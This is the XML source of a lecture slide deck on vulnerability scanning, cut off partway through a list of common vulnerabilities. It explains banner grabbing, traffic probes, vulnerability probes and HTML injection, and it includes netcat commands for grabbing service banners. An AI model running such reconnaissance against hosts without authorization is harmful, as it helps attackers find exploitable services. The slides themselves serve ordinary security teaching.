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302" r:id="rId2"/>
    <p:sldId id="389" r:id="rId3"/>
    <p:sldId id="398" r:id="rId4"/>
    <p:sldId id="404" r:id="rId5"/>
    <p:sldId id="405" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="306" r:id="rId9"/>
    <p:sldId id="406" r:id="rId10"/>
    <p:sldId id="390" r:id="rId11"/>
    <p:sldId id="307" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="391" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="259" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="393" r:id="rId18"/>
    <p:sldId id="260" r:id="rId19"/>
    <p:sldId id="264" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="266" r:id="rId22"/>
    <p:sldId id="401" r:id="rId23"/>
    <p:sldId id="313" r:id="rId24"/>
    <p:sldId id="316" r:id="rId25"/>
    <p:sldId id="267" r:id="rId26"/>
    <p:sldId id="268" r:id="rId27"/>
    <p:sldId id="269" r:id="rId28"/>
    <p:sldId id="270" r:id="rId29"/>
    <p:sldId id="395" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="324" r:id="rId32"/>
    <p:sldId id="397" r:id="rId33"/>
    <p:sldId id="328" r:id="rId34"/>
    <p:sldId id="330" r:id="rId35"/>
    <p:sldId id="331" r:id="rId36"/>
    <p:sldId id="332" r:id="rId37"/>
    <p:sldId id="334" r:id="rId38"/>
    <p:sldId id="336" r:id="rId39"/>
    <p:sldId id="337" r:id="rId40"/>
    <p:sldId id="341" r:id="rId41"/>
    <p:sldId id="343" r:id="rId42"/>
    <p:sldId id="344" r:id="rId43"/>
    <p:sldId id="345" r:id="rId44"/>
    <p:sldId id="346" r:id="rId45"/>
    <p:sldId id="399" r:id="rId46"/>
    <p:sldId id="348" r:id="rId47"/>
    <p:sldId id="350" r:id="rId48"/>
    <p:sldId id="351" r:id="rId49"/>
    <p:sldId id="352" r:id="rId50"/>
    <p:sldId id="353" r:id="rId51"/>
    <p:sldId id="354" r:id="rId52"/>
    <p:sldId id="355" r:id="rId53"/>
    <p:sldId id="356" r:id="rId54"/>
    <p:sldId id="357" r:id="rId55"/>
    <p:sldId id="359" r:id="rId56"/>
    <p:sldId id="360" r:id="rId57"/>
    <p:sldId id="361" r:id="rId58"/>
    <p:sldId id="362" r:id="rId59"/>
    <p:sldId id="363" r:id="rId60"/>
    <p:sldId id="364" r:id="rId61"/>
    <p:sldId id="365" r:id="rId62"/>
    <p:sldId id="366" r:id="rId63"/>
    <p:sldId id="367" r:id="rId64"/>
    <p:sldId id="368" r:id="rId65"/>
    <p:sldId id="369" r:id="rId66"/>
    <p:sldId id="370" r:id="rId67"/>
    <p:sldId id="373" r:id="rId68"/>
    <p:sldId id="374" r:id="rId69"/>
    <p:sldId id="375" r:id="rId70"/>
    <p:sldId id="376" r:id="rId71"/>
    <p:sldId id="377" r:id="rId72"/>
    <p:sldId id="378" r:id="rId73"/>
    <p:sldId id="379" r:id="rId74"/>
    <p:sldId id="380" r:id="rId75"/>
    <p:sldId id="381" r:id="rId76"/>
    <p:sldId id="382" r:id="rId77"/>
    <p:sldId id="383" r:id="rId78"/>
    <p:sldId id="384" r:id="rId79"/>
    <p:sldId id="385" r:id="rId80"/>
    <p:sldId id="386" r:id="rId81"/>
    <p:sldId id="387" r:id="rId82"/>
    <p:sldId id="319" r:id="rId83"/>
    <p:sldId id="320" r:id="rId84"/>
    <p:sldId id="321" r:id="rId85"/>
    <p:sldId id="403" r:id="rId86"/>
    <p:sldId id="388" r:id="rId8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74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="-312" y="-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9B618960-8005-486C-9A75-10CB2AAC16F9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3163535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36930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736600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63623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63A1C593-65D0-4073-BCC9-577B9352EA97}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/2023</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9B618960-8005-486C-9A75-10CB2AAC16F9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3249187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718060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700408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81744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683166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3/1/2023</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734603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3/1/2023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791787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3A1C593-65D0-4073-BCC9-577B9352EA97}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/2023</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2715436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355" y="1680210"/>
            <a:ext cx="8608695" cy="2281555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="7000" dirty="0"/>
              <a:t>Overview of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-IN" sz="7000" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="7000" dirty="0"/>
              <a:t>ulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-IN" sz="7000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="7000" dirty="0"/>
              <a:t>canning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Content Placeholder 126"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2148314"/>
            <a:ext cx="10058400" cy="3996472"/>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Banner/version check</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BANNER?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A banner is simply the text that is embedded with a message that is received from a host. This text includes signatures of applications that issue the message.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 name="Content Placeholder 128"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455737" y="2579687"/>
            <a:ext cx="9286875" cy="3133725"/>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98AAB4-6794-7392-4246-405C7CDC12D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Banner grabbing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CC16081D-68DF-BC5A-B503-FF45D71B1375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Banner grabbing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is technique used to gain information about a computer system on a network and the services running on its open ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Administrators can use this to take inventory of the systems and services on their network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>An intruder/hacker can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We use command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> –v IP PORT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838591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15CA4B-B129-4D6E-1F90-EBC50F6358A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traffic prob</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E160B771-3BDB-3EEA-7129-70EA34B53E89}"/>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Probe is an action taken or object used for the purpose of learning something in a network, a probe is an attempt to gain access to a computer and its files through a known or probable weak point in the computer system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A network traffic pattern is information about the source, destination, protocol, port and bandwidth of network packets . Network scanning is a systematic attempts to communicate with a class of network address via a particular port or protocol to see which computes responds. It is the first step to identify and exploit vulnerabilities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9501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A867BD-72C6-DBBA-5C5F-ACC23DA26360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Need for Traffic probe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FECD99C3-5681-8C1D-164A-84EA490AEE67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Traffic probe is needed to measure and collect the data in large-scale networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>To capture and process data in today’s high-speed networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>To detect abnormal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> and malicious network traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> traffic from embedded network devices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1702096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2" name="Content Placeholder 131"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="532765"/>
            <a:ext cx="10838180" cy="5644515"/>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848320-3537-6152-F0FF-B363268AA772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example	</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{410F00EC-7F7B-6AED-8F84-18F35684878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Web service will not respond until it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>recive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> data from the client machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Consider the example  of valid HTTP request with HEAD method. To get the home page of google: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echo “GET/HTTP/1.0\r\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nHOST:www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>\r\n\r\n”|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> google.com 80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991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D35FD6-0C0E-983C-3A31-8325AA29716A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability probe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BAB08363-6C56-1C7B-1F04-943072E9311F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some security bugs can’t be identified without sending a payload that exploits a suspected vulnerability. These types of probes are more accurate and they rely on direct observation based on port numbers or service banners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>They also carry more risk of interrupting the service, because the test payload must be trying to either produce or take advantage of an error in the service’s code.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7311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 name="Content Placeholder 125"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353695" y="295275"/>
            <a:ext cx="11183620" cy="5882005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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744A5D-FE9F-3F4D-D3AB-257924CA22B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability probe…</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FE83F048-585C-B0B6-4608-A5D3F449BC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>An easy-to-understand example of a vulnerability probe is an HTML injection check for a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The essence of this type of injection attack is injecting HTML code through the vulnerable parts of the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The malicious user sends HTML code through any vulnerable field with a purpose to change the website’s design or any information that is displayed to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Data that is being sent during this type of injection attack may be very different. It can be few HTML tags that will just display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>thesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Also, it can be the whole fake form or page. When this attack occurs, the browser usually interprets malicious user data as legit and displays it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="477442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1F7A18-03AD-7218-B4C9-5DF3EC3FD60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{57B4F7F7-C4DB-4D76-79D3-C8142365997F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Vulnerabilities are everywhere, some vulnerabilities are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>within the software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>within the networking protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>within configuration settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>within hardware architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Or may be through social engineering.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="759305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90FD17-C67C-1359-B265-897A0C3015F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2BB9B85A-8321-FFD8-44F8-A755CE5BE2D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022912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Vulnerability Probe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some security bugs can’t be identified without sending a payload that exploits a suspected vulnerability. These types of probes are more accurate and they rely on direct observation based on port numbers or service banners.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Vulnerability Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>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The most common software security vulnerabilities include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Missing data encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Missing authentication for critical function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
